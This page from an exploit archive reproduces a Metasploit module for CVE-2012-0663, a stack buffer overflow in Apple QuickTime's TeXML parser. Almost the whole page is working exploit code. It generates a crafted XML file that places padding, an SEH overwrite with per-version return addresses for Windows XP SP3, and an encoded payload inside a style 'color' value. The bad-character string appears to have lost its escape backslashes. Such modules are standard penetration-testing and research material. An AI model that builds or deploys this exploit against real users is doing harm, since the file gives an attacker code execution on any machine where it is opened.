Home / exploitsPDF  

Apple QuickTime TeXML Stack Buffer Overflow

Posted on 29 June 2012

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
 Rank = NormalRanking

 include Msf::Exploit::FILEFORMAT
 include Msf::Exploit::Remote::Seh

 def initialize(info = {})
 super(update_info(info,
 'Name' => 'Apple QuickTime TeXML Stack Buffer Overflow',
 'Description' => %q{
 This module exploits a vulnerability found in Apple QuickTime. When handling
 a TeXML file, it is possible to trigger a stack-based buffer overflow, and then
 gain arbitrary code execution under the context of the user. The flaw is
 generally known as a bug while processing the 'transform' attribute, however,
 that attack vector seems to only cause a TerminateProcess call due to a corrupt
 stack cookie, and more data will only trigger a warning about the malformed XML
 file. This module exploits the 'color' value instead, which accomplishes the same
 thing.
 },
 'License' => MSF_LICENSE,
 'Author' =>
 [
 'Alexander Gavrun', # Vulnerability Discovery
 'sinn3r', # Metasploit Module
 'juan vazquez' # Metasploit Module
 ],
 'References' =>
 [
 [ 'OSVDB', '81934' ],
 [ 'CVE', '2012-0663' ],
 [ 'BID', '53571' ],
 [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-095/' ],
 [ 'URL', 'http://support.apple.com/kb/HT1222' ]
 ],
 'Payload' =>
 {
 'DisableNops' => true,
 'BadChars' => "x00x23x25x3cx3ex7d"
 },
 'Platform' => 'win',
 'Targets' =>
 [
 [ 'QuickTime 7.7.1 on Windows XP SP3',
 {
 'Ret' => 0x66f1bdf8, # POP ESI/POP EDI/RET from QuickTime.qts (7.71.80.42)
 'Offset' => 643,
 'Max' => 13508
 }
 ],
 [ 'QuickTime 7.7.0 on Windows XP SP3',
 {
 'Ret' => 0x66F1BD66, # PPR from QuickTime.qts (7.70.80.34)
 'Offset' => 643,
 'Max' => 13508
 }
 ],
 [ 'QuickTime 7.6.9 on Windows XP SP3',
 {
 'Ret' => 0x66801042, # PPR from QuickTime.qts (7.69.80.9)
 'Offset' => 643,
 'Max' => 13508
 }
 ],
 ],
 'Privileged' => false,
 'DisclosureDate' => 'May 15 2012'))

 register_options(
 [
 OptString.new('FILENAME', [ true, 'The file name.', 'msf.xml']),
 ], self.class)
 end

 def exploit
 my_payload = rand_text(target['Offset'])
 my_payload << generate_seh_record(target.ret)
 my_payload << payload.encoded
 my_payload << rand_text(target['Max'] - my_payload.length)

 texml = <<-eos
 <?xml version="1.0"?>
 <?quicktime type="application/x-quicktime-texml"?>

 <text3GTrack trackWidth="176.0" trackHeight="60.0" layer="1"
 language="eng" timeScale="600"
 transform="matrix(1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 1, 0, 1.0)">
 <sample duration="2400" keyframe="true">

 <description format="tx3g" displayFlags="ScrollIn"
 horizontalJustification="Left"
 verticalJustification="Top"
 backgroundColor="0%, 0%, 0%, 100%">

 <defaultTextBox x="0" y="0" width="176" height="60"/>
 <fontTable>
 <font id="1" name="Times"/>
 </fontTable>

 <sharedStyles>
 <style id="1">
 {font-table: 1} {font-size: 10}
 {font-style:normal}
 {font-weight: normal}
 {color: #{my_payload}%, 100%, 100%, 100%}
 </style>
 </sharedStyles>
 </description>

 <sampleData scrollDelay="200"
 highlightColor="25%, 45%, 65%, 100%"
 targetEncoding="utf8">

 <textBox x="10" y="10" width="156" height="40"/>
 <text styleID="1">What you need... Metasploit!</text>
 <highlight startMarker="1" endMarker="2"/>
 <blink startMarker="3" endMarker="4"/>
 </sampleData>
 </sample>
 </text3GTrack>
 eos

 texml = texml.gsub(/^		/,'')

 print_status("Creating '#{datastore['FILENAME']}'.")
 file_create(texml)
 end

end

 

TOP

Malware :

Exploits :